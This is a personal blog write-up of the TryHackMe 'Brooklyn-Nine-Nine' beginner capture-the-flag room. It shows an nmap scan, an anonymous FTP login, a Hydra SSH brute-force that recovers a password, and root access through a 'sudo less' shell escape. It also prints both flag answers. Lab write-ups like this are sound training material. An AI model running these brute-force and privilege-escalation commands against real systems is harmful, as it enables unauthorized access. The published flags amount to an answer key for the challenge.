DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Brooklyn-Nine-Nine - TryHackMe writeup

This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box

EasyLinuxBrute forceSudo abuse4 min read

Open the room on TryHackMe ↗ View on GitHub

Task 1. Deploy and get hacking.

1. User flag

ee11cbb19052e40b07aac0ca060c23ee

2. Root flag

63a9f0ea7bb98050796b649e85481845

1. Let start Scanning the IP with Nmap.

death@esther:~/Lab/Brooklyn-Nine-Nine$ nmap 10.10.112.152 -sV -sC -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-26 16:45 IST
Nmap scan report for 10.10.112.152
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.120.99
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.31 seconds

Here, We can see that there are 3 open ports:

1. FTP on port 21.

2. SSH on port 22.

3. HTTP on port 80.

2. We Get something Intreasting here "FTP".

Let try to login with default Credentials anonymous:anonymous

login successfully.

here we got a txt file. I just downloaded to my system using get command

Here is the txt file,

We got 2 username: Amy, Jake , holt and Jake is our username for ssh as we read note we understand that jake ssh password is weak.

3. Let Brute-force SSH using Hydra.

hydra -l jake -P /home/death/wordlists/rockyou.txt 10.10.112.152 ssh -t 50

login: jake password: 987654321

Logged In as Jake successfully.

I didn't find anything good in jake directory.

Let check for /home,

Here are 3 user, Let check hold directory.

Here is the User-Flag.txt

ee11cbb19052e40b07aac0ca060c23ee

4. Let escalate our privileges

Let's see if we can run any commands of root.

sudo -l

Ok we can run less command as root,Let visit gtfobin

search for less.

Here is for sudo:

sudo less /etc/profile
!/bin/sh

Let Run in terminal

Press Enter on keyboard

We got root

Let find root flag at /root

63a9f0ea7bb98050796b649e85481845

Thank you 😸